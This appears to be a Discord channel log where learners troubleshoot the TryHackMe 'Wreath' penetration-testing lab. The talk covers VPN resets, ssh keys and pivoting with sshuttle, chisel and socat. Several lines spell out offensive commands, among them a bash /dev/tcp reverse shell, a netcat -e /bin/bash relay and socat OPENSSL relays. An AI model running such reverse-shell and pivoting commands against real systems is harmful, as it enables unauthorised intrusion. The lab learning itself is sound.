#wreath-network
i dont see a join button anywhere
oh, should be even more top right, haven't joined more than once tho
no idea 
Leave the room and rejoin.
tried replacing with Muiri's python3 script, still getting the same error :M
finagling with the script I got it to print the response from trying to add a user to repository, it seems the whole response is just "<Response [500]>"
modified the script to try and get it to print "r" (the variable it uses for all the http responses) in the print of the error message
doesn't really help...
did something happen to the network? Seems to be running with plenty of time, but my shuttle just failed, getting no route to host errors, and destination host unreachable with ping
oh whoops, guess it went down a sec, ip changed lulz
That's normal. You sure it's not executing?
the cannot add user to repository is normal?
it doesn't show that error in the screenshot at least, let me see what the next step is
oh well, I need to see the whoami, but I can't, the program exits, if I comment out the quit command I get this
oh I closed my window, can't get it until I get sshuttle connected again... but I get more errors and never get the output to the whoami command
I'm guessing with network restart I need a new ssh key since it's a new machine?... but now the CVE python script is failing... so have to shelve the first issue for a moment lulz
you don't need to get a new openvpn file if the network resets do you?
needed new openvpn file, sshuttle worked, found out I mistyped the name when calling the exploit file lulz
welp, accidentally turned off on me, started the network back up, and now no route to host again, even after getting a new ovpn file, guess I'm done for tonight
I've noticed that the bottom of an instance of the powershell empire client shows unread messages.
Is there a command to read them? I can't find it in the documentation on github.
@manic plover Could you please check this suspicious .exe file archive? 🙂
It doesn't look good
Do you have a screenshot
or can you DM me this person
Sorry, I didn't save any. 😅
I can DM you their name
You were shown as online among the Mods so I tagged you 🙂
I remembered A Devil .. and looked for their username by searching - A Devil Of My Word#1823
Task 5 - What OS does Nmap think is running?
Can I get some help with this one as I can't figure out what it actually wants
Enumerate the web server!
You'll find your answer there
I enumerated it but where are the headers and how to find out information using them
One way I've done it! Sending a request using Netcat to port 80
You can also enumerate port 80 using -sV
thanks bro I will try it later
hey, somehow I can't download nmap to the first machine. I create a python server on my kali VM and curl from the ssh session. It is interesting that I can't ping any address from the ssh session.
VM kali ip I can reach from browser, host win machine doesn't have any blocker (AV, firewall)
Reread everything. That's supposed to happen.
@merry robin Finished Wreath today. Really enjoyed it, great job by all on putting that together.
There are loads of wreath instances.
If you want a reset on your instance, people need to know what network you're on.
hru guys
Ah i was thinking every people are in the same network, thanks for the answer ;)
Gave +1 Rep to @strange bison
I have been having a little bit of trouble to exploit the git server from my machine do I need to route the exploit through sshuttle or a proxychain in order for it to work?
IIRC the git server is on an internal IP address or can I just run the exploit directly from my command line?
how do you mean? So like create a new firewall rule?
in the section that describes the exploit it notes that the firewall on the 200 box will not allow connections in so you need to add a rule for your prt fwd. Pref above 15000 as well
you will need socat or other fwd to then pass it back to your attack box
Git > webserver > you
webserver may be your blocking point as it's blocking the connection from the gitserver with its firewall.
ahh right o, thanks for the clarification @willow ferry!
Gave +1 Rep to @willow ferry
still a little stuck on creating the firewall rule though
Webserver Exploitation
How can I get a reverse shell (without having the script do it for me)? I've tried nc (which isn't installed) and with bash, but both options did not work.
@random cedar https://www.thegeekdiary.com/5-useful-examples-of-firewall-cmd-command/ I read this, pretty useful.
the command for it is in the notes for the task, just need to substitute the relevant ports you want to use. Then list the firewall rules using the commands from the link above
@surreal sail you should copy nc on the box somehow?
Hm. Let me try this. Thanks for now.
Gave +1 Rep to @willow ferry
you can either catch the shell at the webserver or your attack box (with the relevant prt fwd of course)
I don't see how. The kind of shell I am getting running the script (without continuing with "shell"), does not support anything like wget. So how could I possibly upload anything to it?
so just a basic shell, what about native ways can you use powershell to download it?
from the webserver
why are you trying to do it without the script if you don't mind me asking?
Oh, in the documentation it's mentioned that you could do it manually. I like learning stuff the hard way :)
ah I see, fair enough
well if you have command execution on the webserver as nt/system, the shortest path is just create the user and logon normally. it's more direct but you do miss some interesting learning points
you could modify the original gitstack script to post a base64 encoded version to a file and then use the command to decode into a binary
see certutil.exe for the decoding bit
oh, I am not up to that yet. Just started enumerating and exploiting the first machine. I guess once I progress I am gonna understand what you are talking about ;)
haha! yes, sorry spoilers!
🙈
have fun anyway, I've not fully finished this one either
I tend to poke at bits. Got throwback next
Just started today after that AoC fun. Let's see how long this is gonna take me... Can you interact with others connected to that network?
Or is that not part of the room at all?
although there are others who may be on the same instance as you, you should concentrate on the rooms, there is prob a set of rules somewhere about it
which also means you should ensure you are following nice n safe opsec for yourself.
i.e. secure your attack box
yeah, read about it not to mess up the system for others. I was just curious if everyone is just targeting the "room" or there is also something going on between the ones connected
it will be shared with other users.
hence you will come across the notes asking to set up your ports above 15000 so as to not give other users false positives in port scans etc
Sounds fun. Is this quite an old room? I see this channel is very quiet...
And sorry for bothering, you mentioned throwback, is that room similar to this one with a walkthrough?
throwback is another network like Wreath, its paid though. Full AD environment
@willow ferry hm. sounds interesting. Thanks for the assistance in the meantime.
Gave +1 Rep to @willow ferry
no worries, happy learning, ask lots of silly questions, best way.
I hope this wasn't too silly :) Have a good one.
you too.
Why isn't NC installed?
Might be installed. But I can not run it from that simple shell.
Tried with perl and python, too. Getting "Failed to execute command" @surreal sail
With the exploit you type in shell it will then prompt for your IP address of your kali machine and the port you want to use.
Then in a new terminal window type nc -lvnp (port number)
I am trying to do it manually (w/o typing "shell" in the exploit), as the option for doing it manually is mentioned in the documentation.
why do you want to do that?
Why not? Learn something new.
:)
@random cedar The script is launching a shell with perl which is installed on MiniServ. I don't know why I am getting an error trying to do the same.
The shell requires a listener on your end in order for it to establish the connection
and there is where the nc listener comes in
I am aware of that. Please see the attached screenshot. Can you explain to me what's wrong with my command?
You don't need to do that the CVE exploit already has the payload ready written all you need to do is point and shoot really
this is to connect to the .200 server right?
Correct. I am aware that I can use the "shell" and I've done that and I have the id_rsa key already. I just want to know how to do this manually. If you are just looking for the easiest solution how to finish this room, just ignore me :)
ahh right
I just simply used the exploit and it did it for me, but I haven't tried your version
I do have some issues while executing NMAP. I can scan the whole range, but a specified host does not work
Is this the shell from Muir's Webmin exploit?
Could you not get a stable shell or ssh as mentioned in the room?
yes, it is the shell from the webmin exploit, was already trying to get a stable shell 😉 Thanks!
Yeah, it seems to be a TimeoutError as that nmap -sS .. is taking longer😅
And i jumped back into this room after several periods of being away, so i needed to check where i left off
Hello everyone, I don't know why I can't remote desktop into the windows server?
I have created a user and added him to the administrators group and the remote management users also however I cannot remote desktop in the server using those credentials
@oblique crag
Were you able to remote desktop in the windows server?
why did you ping dark?
Which one?
There are two, git-serv and wreath-pc
The room discusses getting a remote desktop connection for git-serv
I did RDP into both of them🙂
Just wanted help? Is it not allowed?
but why ping dark, there are other people who can help you
I didn't know, I just joined the server few minutes ago
Nice, I was talking about the git-serv
I don't know why I am not able to paste a photo over here
!docs verify
You are required to verify yourself first to be allowed to post images and join voice channels and other stuff
Yeah done, thank you for that
Gave +1 Rep to @lusty saffron
Sorry, I wasn't notified for that edited message 🤷♂️
I do not remember the exact steps for this room
Did you add firewall rule correctly?
And set up remote port forwarding to access git-serv's RDP service
And what are you getting as an error while logging in for a remote desktop session?
I am not sure about the third line
@lusty saffron I just did this:
Try this evil-winrm -u user_hacker -p 'P@$$word1' -i 10.200.196.150
Single quote the password (as it contains $, the shell parses it differently)
Perhaps try a simple password to test it 😄
I guess the creds aren't correct, hence the AuthorizationError
anyone run into this issue when trying to run the empire server?
```
Traceback (most recent call last):
  File "/usr/share/powershell-empire/empire.py", line 11, in <module>
    import empire.server.server as server
  File "/usr/share/powershell-empire/empire/server/server.py", line 24, in <module>
    import socketio
  File "/usr/lib/python3/dist-packages/socketio/__init__.py", line 3, in <module>
    from .client import Client
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 7, in <module>
    import engineio
  File "/usr/lib/python3/dist-packages/engineio/__init__.py", line 8, in <module>
    from .asyncio_client import AsyncClient
  File "/usr/lib/python3/dist-packages/engineio/asyncio_client.py", line 7, in <module>
    import aiohttp
  File "/usr/lib/python3/dist-packages/aiohttp/__init__.py", line 6, in <module>
    from .client import (
  File "/usr/lib/python3/dist-packages/aiohttp/client.py", line 35, in <module>
    from . import hdrs, http, payload
  File "/usr/lib/python3/dist-packages/aiohttp/http.py", line 7, in <module>
    from .http_parser import (
  File "/usr/lib/python3/dist-packages/aiohttp/http_parser.py", line 15, in <module>
    from .helpers import NO_EXTENSIONS, BaseTimerContext
  File "/usr/lib/python3/dist-packages/aiohttp/helpers.py", line 667, in <module>
    class CeilTimeout(async_timeout.timeout):
TypeError: function() argument 'code' must be code, not str
```
with 0 knowledge of what's going on, my first guess is something to do with python 2 vs 3? No idea tho
Thank you very much, I should just use password123 from now on instead of P@$$word which looked much more secure 😂
Gave +1 Rep to @lusty saffron
They both are pretty insecure 😄
@minor dawn kali issue, apt purge powershell-empire and use the instructions from the official repo
manual install, but works nicely
Oo thanks
Gave +1 Rep to @willow ferry
yer, I hit the same issue, fresh install of Kali too
weird part is it was working fine like last week, haven't tried to use it since then, spin up the VM yesterday and immediately get that issue, I guess an issue with a new update?
possibly, just not really reliable enough to risk a update whilst testing. 😦
I have used the docker version too which is OK.
But the normal install works great
screw apt installing
Anyone have a link to a good url encoded powershell reverse shell? I’m trying to use it for the bonus question on task 20 (git server) but none of the ones I’ve used have worked
i havent started this box yet and am not familiar with perl. Failed to execute command, means it is trying to execute the perl command you gave (so perl is certainly installed)
gotta be a typo somewhere in that. Try doing that command on your kali machine, ensure you can get a shell to yourself with that command
I'll give it another try.
1st thing i do when copy / paste some long command like that and it doesn't work. Try it out on my box, can i get the reverse shell to myself
and from looking at the screenshot, you appear to be either missing a ", or you have an extra "
the 1st quote in the command is after the perl -e ' <---single quote...but the whole command ends with '" (single followed by double quote)
starting the room now :)@surreal sail
now you are missing a quote it looks like...so the other command was correct with all its quotes. Try breaking the command into multiple lines (using the ; as a line separator) or...and this is a guess...perl is sort of like netcat in that some versions of perl have -e functionality and some don't? or is that dumb because the exploit is using the same command and it works fine?
Huh, is there SELinux on prod-serv?👀
Sorry. Can you explain? 🤷♂️
I wasn't asking you in particular
Just replied to your screenshot 😄
There is context=... in the output of id
IIRC, id shows context if SELinux is configured on the system
And I don't remember seeing that when I completed this room 😅
There is, yes. It's not enforcing anything though.
Was it added recently, because I can't remember seeing that in my runs?
Perhaps, to prevent users messing with tasks to some extent 🙂
@surreal sail think i am at the part you are. Task 6?
Yes!
@surreal sail playing around with this. the perl in your SS is the shellcode from the exploit? my guess is that there is a bad char. perl -v, and perl -h both give output
and this bash reverse shell works from the exploit prompt (not typing shell)
bash -i >& /dev/tcp/10.20.30.40/1234 0>&1
so that perl command has a character in it that needs to be escaped or quoted or unquoted or something
@hollow plume right now, I can't connect to that server. No idea why.
time limit? i am down to 27 minutes
VPN is up. Can't ping it. Exploit doesn't run.
Still have time.
(right VPN file, not the regular)
i dont know perl well enough to keep poking at that aspect of it, but its guaranteed a bad char...hrm gonna try base64 the perl command then do echo bgajgadj32 | base64 from the exploit prompt
looks like it died on me as well, 22 minutes left on it
Weird. S/o extended my instance by another hour and I can't even ping it.
Someone's having fun.
I feel like when I have to deal with my neighbours :)
*sigh*
Problem with letting people root it is that there will always be immature little trolls who think that shutting the server down is an amusing use of time.
Just go for a reset -- if you can figure out who the morons are I'll see about getting them removed 🙂
Ok, captain. Awesome room. Honestly :)
@merry robin I'm in no rush, still wrapping my head around windows AD and windows buffer overflows
Also taking my time so I can take better notes 🙂
so the entry point is unreachable, i don't know if someone shut it down errr whu
do i have to wait and vote 4 more times before i can resume unless others vote as well? or can someone reset it from an admin panel or something?
You may provide your subnet IP, 10.200.x.x
One of site staff can help you here🙂
IIRC, a user can vote for a reset every hour
You just got another vote from me 🙋♂️
Is pinging one of them (like Ben?) accepted practice?
I personally have no idea about it
If you think it is urgent, like you found a site-bug or in some adverse situation; you may ping one of them🙂
They usually respond in short amount of time😄
depends if you think not being able to do anything on the network is adverse
i guess i could go do something else for a while, just come back and vote every hour
@surreal sail if we vote in an hour and an hour after that, it will reset
¯_(ツ)_/¯
alrighty, I set myself an alarm clock... I am sure this lunatic that did this is just laughing 8-}
i hope it gets logged somewhere
i am having oodles of fun with this network though
well, before this
lol
2 more
anyone with a target subnet of 10.200.194.0/24, please vote for reset
the network went to sleep and i woke it up 🤞 hopefully it works
@surreal sail it's alive
┌──(tmh㉿facepalm13)-[~/Documents/thm/wreath]
└─$ ping thomaswreath.thm
PING thomaswreath.thm (10.200.194.200) 56(84) bytes of data.
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=1 ttl=63 time=149 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=2 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=3 ttl=63 time=144 ms
c64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=4 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=5 ttl=63 time=147 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=6 ttl=63 time=145 ms
^C
--- thomaswreath.thm ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5014ms
rtt min/avg/max/mdev = 143.945/147.495/150.221/2.396 ms
no reset votes needed now as far as i can tell
Great! Thanks, mate.
Gave +1 Rep to @twin flame
yeah! no worries
Any ideas as to why I suddenly can’t connect to the first machine in the network? The Thomaswreath url works but I can’t ssh into, ping or scan it and I was working fine an hour ago
Maybe time expired?
Are you on 10.200.194.200?
Initially it did but I’ve since started it again. Now it just says no route to host for ssh
10.200.197.200
Succeeded once to copy/pasting the SSH key from prod_serv. Once the machine get reset I needed to fetch it again and I am getting invalid format
make sure you got the newline at the end
and if you are copy / paste from tmux...make sure you full panel ( if you have multiple panels open: ctrl+b, z) before copy / paste otherwise you will get a bunch of strangeness
i can give you the key? should be the same probably?
Hm. Let me try again. Do you copy the last line completely or just till the last - ?
i always do to the bottom (including the blank line under)
the white part being what i am selecting to copy
Gave +1 Rep to @hollow plume
Took me half an hour trying different editors... :-/
ya different editors handle whitespace and linebreaks etc differently
i generally use nano when copy / pasting things like ssh keys
@surreal sail ok to add you as friend?
@hollow plume Of course. :)
🙂
sshuttle -r root@10.200.192.200 10.200.192.0/24 -e "ssh -i root.webserver.priv"
how come I can't ping 10.200.192.150?
[root@prod-serv ~]# ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
64 bytes from 10.200.192.150: icmp_seq=1 ttl=128 time=1.26 ms
laurence@laupc ~/THM/wreath % ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
^C
--- 10.200.192.150 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3027ms
what are the prerequisites for this room (other than linux command line)?
There's a lot to be said for reading the Introduction for rooms 🙂
I finally got it!!
I restarted 3 times because I got stuck
in the past 5 months or so
but aye I finally did it
please stop extending the time on the 10.200.194.0 network, it needs to sleep so that the entry point can boot
🤞 hoping that works again
Hi All, I'm a subscriber, and have no access to Wreath network, I'm in the room... no VPN servers for me... I have access to holo network... Any ideas?
Nevermind. I left room and join again - all works. So... 99% repairs - turn off and turn on again 🙂
Having trouble connecting to wreath today
I did a small bit yesterday from my VM, had no trouble connecting or anything
but today even though the access page shows I'm connected the ip of the first machine is unreachable
and I am connected with the wreath openvpn config file
I'm on 10.200.199.200 btw, voted to reset but it's only 1/4 guess I'll need to try later, maybe if it sleeps it starts up again properly?
Yes, please reset it.. server did not respond for me...
I just cast the "deciding vote" to reset the network with this IP address, so it should be good now
in fact, I'm confirming it is good now
Thank you!
Hey, why doesn't the metasploit's portfwd work?
Took me a couple of days to work through it and take detailed notes, fun little lab though!
Didn't follow the guide in the AV Evasion section, went for a full Powershell + C# solution. Didn't like the proposed uploading of netcat.exe solution 🤷♂️
Yeah. 101 ways to do it, I went for the simplest, most beginner version I could think of given the spec was for a complete beginner network 🤷♂️
Just finished Wreath. Very well done and educational network!!
Hey no worries, I've done a couple of things not following the guide but that's partially due to personal taste and experience I guess.
But that doesn't mean it isn't a fun lab to work through. There is quite a good amount of content to be found there even though it's only 3 machines.
It should work as well, though port forwarding individual ports instead of putting up a socks proxy is probably a bit too much of a hassle. Also with the network going to sleep sometimes I would suggest to just use sshuttle and a forward socks proxy with chisel, it's the easiest to work with.
You can then also use Burp in this way when you configure it to route through the chisel proxy.
Hello, for task 34, i tried using chisel for pivoting and I followed the walkthrough from dark but when i try running chisel on my machine, i keep getting a connection error. I put a screenshot of my commands as well
Did you open port 19997 on the windows box? If not then the chisel client can't connect to the server
we do that with the netsh advfirewall ... command right?
YEs
i did in the pane on top and got "Ok" as a response
could it be something with my internet at home? my router has been acting up lately
I would expect that your VPN connection would also crap out in that case, no?
true
then that cant be it because all the other shells and connections were going through
You're sure that your chisel server is running on the windows box and is listening on port 19997?
i mean i got the "Ok" response from running the netsh command with port 19997 as the localport
ill try to find how to check open ports and see if 19997 is there
yea ill check with it soon and i was in the screenshot as well
then client on our box correct?
yes, chisel server in forward proxy mode on the compromised windows box and then run the chisel client on your attack box
ok thank you, ill post when i try again
I was doing the task 6 and wondering if someone has changed the root password, because the hash i get is not being accepted and it's different than in the walkthrough video
yea the port 19997 is not showing up when i check with netstat
Then your chisel server is probably not running or you put it on another port
ive tried adding a different port too and the same issue, it doesnt seem to open up
But you must have a process listening on that port before it shows up with netstat.
Just opening a port on the firewall doesn't show anything with netstat because there is nothing actually listening on the port you opened on the firewall
ok that makes sense, ill try running chisel with the new port now
got it, something was wrong with my chisel
Just started this network but already stuck on task 6. I always get "[-] Failed to execute command" when I run the CVE....py script.
For task 41, I cant seem to get a shell back, the netcat is being uploaded onto the target but i cant seem to execute the powershell command to get the shell back
runs after a network reset...
hey friends, i have a problem with the connection to Wreath, is this a general problem with all of you??? because the ssh stuck every 10 sec
I am stuck and can't continue the room, last 4 hours for nothing in this room
You may try this out, if you are using openvpn
# set the MTU size to 1200 bytes
sudo ip link set mtu 1200 dev tun0
Check pinned messages in #site-support
This is one of the suggestions to resolve network issues😄
thanks you 😂 @lusty saffron
Gave +1 Rep to @lusty saffron
Finally finished! Awesome stuff and learned a ton. Hopefully I did a good job cleaning up lol, i think i got everything. Thanks @merry robin !
Gave +1 Rep to @merry robin
Hi all, I can't connect to the network via VirtualBox and OpenVPN, however, I can confirm I'm connected to THM via 10.10.10.10
anyone else having problems?
Just seeing this, will take a look!
I think, the openvpn for wreath doesn't allow connections to 10.10.10.10
Are you using the right configuration file - wreath's openvpn configuration file
I think thats it. Thanks so much!
Gave +1 Rep to @lusty saffron
So I'm stuck at the reverse shell in the webserver exploitation part. I'm running the python script, turning on the listener in a different tab and then... nothing.
Don't want to spoil anything, so what do you need from me to be more specific?
It took a few days to finish the room, but I learned a lot. Thanks for making this!
you could post a screenshot with spoiler tags to show what you were doing
To check, you're running the VPN in Kali right?
Not on the host OS?
is anyone else getting module issues with empire?
task 33 the github link is down
No idea about the module issues, but I've hunted down what the heck they did with the ps1 source code and changed the link to point at it :)
@fair breach
The Wreath Network is down
10.200.125.0/24
Could you please reset it ??
There aren't enough votes for a reset
Turn on the listener first...run the script...the reverse shell should then catch if written correctly.
Why is cherrytree still recommended in this network when according to the creator "it crashes on large file sizes and is impossible to export out of" and you should switch to Trilium?
Two reasons:
A) I wrote Wreath before switching to Trilium for my regular notebook, but more importantly:
B) I still use Cherrytree for pentests / projects / CTFs / smaller notebooks in general. Effectively everything that isn't my regular hacking notebook.
In other words, if I were given Wreath as a pentest, I would still be using Cherrytree as advised
It's only really when it gets to 40 or 50 odd megabytes that it starts getting unstable. For me that was about 1200 nodes. You are never gonna hit that with a pentest
oh thanks for clearing that up.
Gave +1 Rep to @merry robin
Hi. I've been trying to ssh into the machine for quite some time now but i always got (publickey,gssapi-keyex,gssapi-with-mic) error.. I also didnt find anything useful on the internet.. Then i checked previous chats in this room and saw someone that said add 2-3 new lines at the end of the file and tried that and it worked. Can anyone explain why? in my experience ssh usually fails if there are new lines at the end of the rsa file
Well that's a new one. Nice one. You evaded the bot
But not me
-ban @main ermine Steam Scam -- Compromised account -ddays 4
🔨 Banned maharsomi#9391 indefinitely
Jesus Christ we're having fun today aren't we
-ban 330101054668800010 Scam... of some kind. I actually have no idea why you're advertising weight loss pills 🤷♂️ -ddays 2
🔨 Banned Флоки*#9819 indefinitely
hello guys
any help with ssh error Permission denied (publickey,gssapi-keyex,gssapi-with-mic) ?
I'm going crazy... tried different ssh conf, adding an empty line at the end of the key, firewall, but nothing... i can access other machines via ssh but not this one
the id_rsa file is empty, any way of restoring it, or must reset the server?
the id_rsa file on the initial server *
a new one has been just generated, thank you
anybody managed to fix the ssh attempt to connection error Permission denied (publickey,gssapi-keyex,gssapi-with-mic)?
I noticed that on the remote host the authorized_keys file permission is set to -rw-r--r-- and online I could read that the permission is supposed to be set to -rw-r--r-- . However, it's not possible to modify that file (access denied)
I really hope...
also, the ssh connection is not allowed not even without the id_rsa file, and just trying with ssh root@x.x.x.x
I receive the same error
Ah so it's not solved... yesterday with the or not it gave me the error
With the key *
I can't connect at this time
If somehow I can get in let me know...
You* o boy I woke up 5 minutes ago I can't write properly
I think the issue is in the file authorized_keys. its content is different from the id_rsa.pub and has permission of -rw-r--r--
dunno...seems people using the thm vm can log in ...
and read this
read the mikka message on this chat, he solved it by adding 2-3 empty lines at the end of the rsa
but in my case it did not work
fixed
i'm in
i created a new authorized_keys file called authorized_keys2 then changed the conf sshd_config file to use the authorized_keys2, restart the service and I'm in
basically the authorized_key files must contain the id_rsa.pub key
the original file had a different .pub key. Or at least I think that was the reason, it's working now

can I ask someone if the solution I think of for the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat} is correct? I can't find the solution online (and I don't know how to cover a line under the 'spoiler' on the chat)
||SPOILER TEXT GOES HERE||
HELP TASK 5. When I run this command in web enumeration, it is super long before ending the scan. Moreover, the output shows way more open ports than it is supposed to. Does someone know why? nmap 10.200.164.200 -v -p 1-15000 --open -Pn -oA /home/amandine/Desktop/Wreath/initial-scan
ssh: connect to host 10.200.187.200 port 22: No route to host
only at me ? till 20min ago i can log now give me this error ...
Did you check if the network is running and not sleeping?
Network state : running
with ping the output says host unreachable
is there time left in the machine? the yellow button next to 'start' should have time running, if not, just add more time clicking the yellow button
-undelete -a
Up to 10 last deleted messages (last hour or 12 hours for premium):
2 minutes ago (Thu Jan 13 11:17:47 2022) Earwig#6490 (ID 928511483040649236): || test spoiler text ||

oh it was just a spoiler text try 😄
Sounds like people might be being douches and not opening their ports above 15000. Can you share a screenshot?
All good -- just hunting for the ghost ping 😆
can I ask someone if this could be the correct solution to the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat}
||./socat OPENSSL:ATTACKING_IP:8001,cert=shell.pem,verify=0 OPENSSL:TARGET_IP:TARGET_PORT,fork,verify=0 & (quiet)|| -- quiet
||./socat OPENSSL-LISTEN:33060,fork,reuseaddr,cert=shell.pem,verify=0 OPENSSL:172.16.0.10:3306,verify=0 & (easy)|| -- easy
Uh I'm stupid but not that much
anyway I logged now and was ok ... dunno what it was
Thank u anyway
hello guys how to solve the id_rsa problem?
root@10.200.188.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
try now
Yup! Look! I do not know why I have so many random open ports. Here is the command I have used: nmap 10.200.164.200 -v -p 1-15000 --open -Pn -oA /home/amandine/Desktop/Wreath/initial-scan
Yeah, that's people being assholes. Just reset the network on them
Ok. I need 8 people supporting this. Three votes out of 8 for the moment. 🙂
Hosts behind the .200 are dead :(
Except the out of scope ips
I am connected to the wreath vpn but I can't ping the first machine. This happened to me yesterday too but somehow it got fixed. Any ideas why this happens? How can I fix this issue?
Sometimes the network is just in sleepy mode dude, check this first 😉
That happens sometimes when people are asses and shut the box down to spoil it for others.
Go for a Reset, and if you find out who did it, let me know and I'll chuck 'em out of the room :)
thank you
same problem right now:(
I just got disconnected too. I am really disappointed, I am preparing for an exam
reset needed
I might need a little help with the task 20 - setup socat relay and run web-shell with burp. I think I have set up the relay, run netcat on the .200 server, get the reverse on my kali machine, but when I run the web-shell with Burp Suite, I'm not really sure where I should catch the shell.
What I have done:
On the .200 server: run socat with tcp-l:23000 attackIP:45454 &
on the .200 server: run netcat 127.0.0.1 23000 -e /bin/bash --------- at same time on my kali machine run netcat -lvnp 45454, this gives me the shell (not sure if this step was actually done right, and if I am supposed to have shell of the .200 server). Now I run the powershell exploit with Burp Suite, but don't understand where I should get the shell, because nothing changes anywhere. Could anyone help?
the webshell is written with the ip of the .200 server and port 23000 (the one I opened on the server and set up the socat relay on as listener)
Oh, I just figured it out. sorry for the stupid question and spam. It's 2am and I should go to sleep. I was supposed to run just the socat script on the .200 server and the nc on my machine. This way my nc will catch the webshell 
r/ this -- @fair breach you working / able to take a look into whether machines are down?
yeah I can look to see if a machine is up/down
I need a subnet but pref a whole machine IP (:
should this setup work? i'm on the Reverse SOCKS Proxy: section of task 14
(i just read the next section and it mentioned to use socks5 proxy oops, but i just tried that too and still fails)
Hi! I was wondering what is written in the script nc-MuirlandOracle. What does that script do exactly?
it's just nc, using the naming convention he suggested in earlier tasks program-username
ok thanks so its just the command nc ?
Gave +1 Rep to @oblique oar
yes just standard netcat :)
i say standard, but it's the version of nc with the -e flag (default on kali, but other OS's it's a slightly different version)
Great! Thanks for your help! I also have another question, where can I find a socat binary that I can transfer to the target machine? Can I just take my binary in /bin/socat then make a copy like /bin/socat-amandine, then transfer socat-amandine to my target machine?
not sure if that relies on other files so idk
i use the version included in the static-binaries repo
Okok! This is what I have tried but I have trouble understanding how the static binaries repo works. Have you transferred the whole folder? @oblique oar
no, it's in static-binaries/binaries/linux/x86_64
Ohhh alright! Thanks so much for help 🙂
Gave +1 Rep to @oblique oar
no worries
Chisel Task 14: Has someone already encountered this issue while unzipping a file? I have tried with many unzip utilities, but it is always saying that my file is not in the right format. I have also tried redownloading it multiple times.
just unzip no?
and you got it in your tools.zip from the start 😉
Nan it does not work I do not know why... @wet dawn :/ I have tried with unzip too
In the zip tools.zip from task 1 you have it
ohhh yeah I just found out! Thanks! But why the file does not unzip is quite strange tho! I'll use the one provided by the room.
Gave +1 Rep to @wet dawn
no idea, but go ahead haha 🙂
run file on it, what does it return?
can someone check network, maybe this is problem on my side?
what network? mine is fine
also, a nice little shortcut for this:
send it as a GET request, and then right click Change request method:
Someone has nuked the firewall for that
ah rip oka
Now that is fun.
ye it's nice, changes the method, adds the headers, and swaps the get data to post data
Gonna leave it as is because it'll hopefully teach people what the differences actually are, but add a note for that, I think
Noice ... but actually Instead of burp I'm trying to learn more curl
It makes me feel more hackerman
I waited for the network to sleep then started it again, seems to be working now
Sometimes when the timer goes to zero the button to add more has some problems, at least in my browser... try to restart the vpn and open a new wreath page... that should solve it
I have a problem with Empire's hop
the options are set ok, and it says all was uploaded on /tmp/hop/ but on .200 /tmp/ there is actually nothing
[] Starting listener 'http_hop_'
[] Hop redirector written to /tmp/http_//admin/get.php . Place this file on the redirect server.
[] Hop redirector written to /tmp/http_//news.php . Place this file on the redirect server.
[] Hop redirector written to /tmp/http_//login/process.php . Place this file on the redirect server.
it writes on your machine /tmp/, not on .200
you have to transfer the files to the machine
After 10 days, the IP addresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run script for WebMin RCE not working ...
I had to make sure to update my /etc/hosts and anywhere you put the IP in scripts
also if you've made it to the sshuttle part, make sure you use the new network in that command
TASK 18 - Git Server Pivoting: Getting this error when trying to pivot with sshuttle. I have installed sshuttle. I have checked that I have ssh access to 10.200.164.200 and have verified that python is installed on 10.200.164.200 too. Any idea? 😮
Never mind everyone. I just added sudo at the beginning of the command and it works. Leaving the error here in case it can help someone else.
task 29, i'm failing to get a callback from the git server, here is my config in empire:
but when i run the powershell payload on the git server, it's not giving me anything back:
I think your encoded payload in Burp should all be in one line
also make sure you've opened up 50000 on the web server's firewall, that got me stuck for a bit
ye i did that, that got me in an earlier task aha
looks like the command is giving an error or something?
nvm encoding it worked
thank you that would have taken me ages to see 😅
Gave +1 Rep to @tacit anchor
what's this doe with empire
try using "shell hostname", I'm not sure if hostname works on its own, I would need to check the help
ohhh didn't realise i had to prefix commands with shell in starkiller too
some commands you don't (like whoami), you can check the help menu in the agent to see what it supports
oops I didn't realize you were using starkiller, I didn't use it so I have no idea how commands differ there.
Thanks! I made changes in /etc/hosts but it's still not working in the first steps with machine .200 :/
Gave +1 Rep to @tacit anchor
wreath was so amazing thank you so much muir !! i learnt loads from this network and is definitely my favourite "room" on thm so far. all the content was formatted beautifully, in a logical manner staying clear and concise, and was really useful knowledge <3
Hey jake, May I DM?
sure
After 10 days, the IP addresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run nmap for first machine ( host down), script for WebMin RCE not working ...
What I should do?
Try re-downloading your wreath VPN package and connecting with that one, I had to do that at one time
As it says in the room, you get chucked out every ten days and have to rejoin the room. That usually means requiring a new VPN pack for a new subnet
Answers remain and each subnet is identical, however
any pros and cons on sshuttle method?
there's some listed in the task that explains it. you have to have SSH access and the endpoint has to be Linux from what I remember
- needs python on the target
Hi. Can someone help with sshuttle?
I can't get it to work for scanning internal network
I use following command to set it up:
||sudo sshuttle -r root@10.200.195.20 --ssh-cmd "ssh -i id_rsa" 10.200.195.0/24||
it says "connected to server", but seems like it does not really work. Scanning network with nmap gives same results as without sshuttle
what am I missing here?
Isn't the web server .200 ?
Yup
your command points to .20
I would also exclude the web server so you can still connect to it, with the -x switch
but otherwise it looks OK, assuming your lab is using 10.200.195.0/24
Sorry that was a typo on discord. In the command i use it is 200
I tried excluding but that did not solve it either
I can't speak to how nmap works over sshuttle, I used a static binary transferred to the web server to run my scan.
Sure it works, but i wanted to test sshuttle
Thank You, I will try soon!
Gave +1 Rep to @merry robin
just looking at this room. Do you still need to download a specific connection pkg if you want to use your own attack VM? I joined the room, am a member, but it still says "You don't have access to any networks" when I looked for the specific wreath VPN connection pkg that it suggests in the "accessing the network task". Or did you guys just use the attack box?
